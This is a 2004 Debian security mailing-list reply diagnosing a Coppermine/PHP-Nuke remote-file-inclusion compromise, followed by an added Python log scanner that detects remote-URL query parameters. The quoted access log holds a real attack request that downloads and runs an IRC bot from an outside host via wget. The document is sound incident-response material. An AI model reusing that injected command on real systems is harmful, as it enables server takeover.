
Re: Advice needed, trying to find the vulnerable code on Debian webserver.

On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then executed seem to be IRC bots.
> http://www.energymech.net/
> Here are some log files.
> - - [18/Jun/2004:22:57:04 +1000] "GET
> /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabe
> la.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xz
> vf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200
> 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

> All those executables in the /tmp dir seem to be all coming from that
> site on our box, definitely the culprit.
> Can someone explain what is going on here ?
> Cause it doesn't make any sense.

  There seems to be some buggy PHP code being used on that site, which 
 is allowing the remote inclusion of content from the mirabella.net 
 site - this is being abused to run code upon your host.

  You should immediately disable the coppermine PHPNuke module and
 get it patched, upgraded, or replaced.

  Going to securityfocus.com and searching the mailing lists for
 coppermine pulls up multiple hits describing problems - for example
 this post:


  Notice the URLs on section E2?  They match yours..

  See this one for more details too:


  Two things you can do immediately to stop this particular exploit
 are run safe mode for PHP, and firewall off access to mirabella.net.

> What steps should I take now ?

  Remove PHP Nuke, check the logs for other activity, make sure your
 kernel is patched against local root via the recent holes, and
 look at using a locked down PHP installation - I'm not sure how
 PHPNuke will work with that, but it's gotta be worth a try.

# The Debian Security Audit Project.
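
Added example, not part of the original message: a log check for the pattern in the quoted request, where a query parameter's value is itself a remote URL and further parameters carry URL-encoded commands. The function names, sample lines, addresses and the host remote.example are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request line and status code from an Apache common/combined log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def scan_line(line):
    """Return a finding if any query parameter value is a remote URL, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target, status = m.group(1), int(m.group(2))
    parts = urlsplit(target)
    # Split on '&' by hand: shell payloads contain ';', which some
    # query-string parsers also treat as a separator.
    params = {}
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if name:
            params[name] = unquote_plus(value)  # decode %20 etc. for review
    remote = {k: v for k, v in params.items()
              if v.lower().startswith(REMOTE_SCHEMES)}
    if not remote:
        return None
    return {
        "script": parts.path,
        "remote_params": remote,
        "other_params": {k: v for k, v in params.items() if k not in remote},
        "status": status,
    }

def scan_log(lines):
    """Collect findings from an iterable of log lines."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample lines (addresses and hosts are placeholders).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://remote.example/a.txt?&cmd=uname%20-a HTTP/1.0" 200 6461 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [18/Jun/2004:22:58:10 +1000] "GET /index.php?name=News&file=article HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '192.0.2.12 - - [18/Jun/2004:23:01:44 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=HTTP%3A%2F%2Fremote.example%2Fb.txt HTTP/1.0" 404 312 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Log lines that were wrapped by a mail client, as in the quoted message, need to be rejoined into single lines before scanning.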
